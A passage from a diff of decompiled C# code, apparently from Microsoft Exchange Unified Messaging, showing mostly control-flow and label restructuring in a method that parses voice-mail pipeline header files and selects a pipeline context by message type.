\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t\telse if (num2 <= 3342616108U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num2 != 2975106116U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (num2 == 3342616108U)\n +\t\t\t\t\t\t\t\t\tif (num2 != 3342616108U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (text4 == \"TenantGuid\")\n -\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.TenantGuid = new Guid(array[1]);\n -\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"TenantGuid\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tsubmissionHelper.TenantGuid = new Guid(array[1]);\n +\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\telse if (text4 == \"SenderAddress\")\n +\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"SenderAddress\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\tstring text5 = array[1];\n \t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t\telse if (num2 != 3581765001U)\n \t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\tif (num2 == 4186841001U)\n +\t\t\t\t\t\t\t\tif (num2 != 4186841001U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (text4 == \"CultureInfo\")\n -\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tsubmissionHelper.CultureInfo = array[1];\n -\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\tif (!(text4 == \"CultureInfo\"))\n +\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\tsubmissionHelper.CultureInfo = array[1];\n +\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\telse if (text4 == \"MessageID\")\n +\t\t\t\t\t\t\telse if (!(text4 == \"MessageID\"))\n \t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\ttext2 = array[1];\n -\t\t\t\t\t\t\t\tcontinue;\n 
+\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\ttext2 = array[1];\n +\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\tIL_409:\n \t\t\t\t\t\t\tsubmissionHelper.CustomHeaders[array[0]] = array[1];\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\tnum2 = <PrivateImplementationDetails>.ComputeStringHash(text);\n \t\t\t\tif (num2 <= 894870128U)\n \t\t\t\t{\n \t\t\t\t\tif (num2 <= 360985808U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 != 356120169U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (num2 == 360985808U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (text == \"Fax\")\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tpipelineContext = new FaxPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t\telse if (text == \"IncomingCallLog\")\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tpipelineContext = new IncomingCallLogPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (num2 != 438908515U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 != 466919760U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (num2 == 894870128U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (text == \"CDR\")\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tpipelineContext = CDRPipelineContext.Deserialize((string)submissionHelper.CustomHeaders[\"CDRData\"]);\n -\t\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t\telse if (text == \"MissedCall\")\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tpipelineContext = new MissedCallPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (text == \"OCSNotification\")\n \t\t\t\t\t{\n \t\t\t\t\t\tpipelineContext = OCSPipelineContext.Deserialize((string)submissionHelper.CustomHeaders[\"OCSNotificationData\"]);\n \t\t\t\t\t\ttext2 = pipelineContext.messageID;\n 
\t\t\t\t\t\texDateTime = pipelineContext.sentTime;\n -\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\telse if (num2 <= 1086454342U)\n \t\t\t\t{\n \t\t\t\t\tif (num2 != 995233564U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 == 1086454342U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (text == \"XSOVoiceMail\")\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tpipelineContext = new XSOVoiceMessagePipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (text == \"PartnerTranscriptionRequest\")\n \t\t\t\t\t{\n \t\t\t\t\t\tpipelineContext = new PartnerTranscriptionRequestPipelineContext(submissionHelper);\n -\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\telse if (num2 != 1356218075U)\n \t\t\t\t{\n \t\t\t\t\tif (num2 != 2525024257U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 == 3974407582U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (text == \"SMTPVoiceMail\")\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num < PipelineWorkItem.ProcessedCountMax - 1)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tpipelineContext = new VoiceMessagePipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\tpipelineContext = new MissedCallPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (text == \"HealthCheck\")\n \t\t\t\t\t{\n \t\t\t\t\t\tpipelineContext = new HealthCheckPipelineContext(Path.GetFileNameWithoutExtension(headerFile));\n -\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\telse if (text == \"OutgoingCallLog\")\n \t\t\t\t{\n \t\t\t\t\tpipelineContext = new OutgoingCallLogPipelineContext(submissionHelper);\n -\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\tgoto IL_694;\n \t\t\t\t}\n \t\t\t\tthrow new 
HeaderFileArgumentInvalidException(string.Format(CultureInfo.InvariantCulture, \"{0}: {1}\", \"MessageType\", text));\n -\t\t\t\tIL_62E:\n +\t\t\t\tIL_694:\n \t\t\t\tif (text2 == null)\n \t\t\t\t{\n \t\t\t\t\ttext2 = Guid.NewGuid().ToString();\n \t\t\t\t\texDateTime = ExDateTime.Now;\n \t\t\t\t}\n \t\t\t\tpipelineContext.HeaderFileName = headerFile;\n \t\t\t\tpipelineContext.processedCount = num;\n \t\t\t\tif (contactInfo != null)\n \t\t\t\t{\n \t\t\t\t\tIUMResolveCaller iumresolveCaller = pipelineContext as IUMResolveCaller;\n \t\t\t\t\tif (iumresolveCaller != null)\n \t\t\t\t\t{\n \t\t\t\t\t\tiumresolveCaller.ContactInfo = contactInfo;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\tpipelineContext.sentTime = exDateTime;\n \t\t\t\tpipelineContext.messageID = text2;\n \t\t\t\tpipelineContext.WriteHeaderFile(headerFile);\n \t\t\t\tresult = pipelineContext;\n \t\t\t}\n -\t\t\tcatch (IOException ex)\n +\t\t\tcatch (IOException ex2)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"Failed to parse the header file {0} because its not closed by thread creating the file. Error={1}\", new object[]\n \t\t\t\t{\n \t\t\t\t\theaderFile,\n -\t\t\t\t\tex\n +\t\t\t\t\tex2\n \t\t\t\t});\n \t\t\t\tif (pipelineContext != null)\n \t\t\t\t{\n \t\t\t\t\tpipelineContext.Dispose();\n \t\t\t\t\tpipelineContext = null;\n \t\t\t\t}\n \t\t\t\tresult = null;\n \t\t\t}\n -\t\t\tcatch (InvalidObjectGuidException ex2)\n +\t\t\tcatch (InvalidObjectGuidException ex3)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceWarning(ExTraceGlobals.VoiceMailTracer, 0, \"Couldn'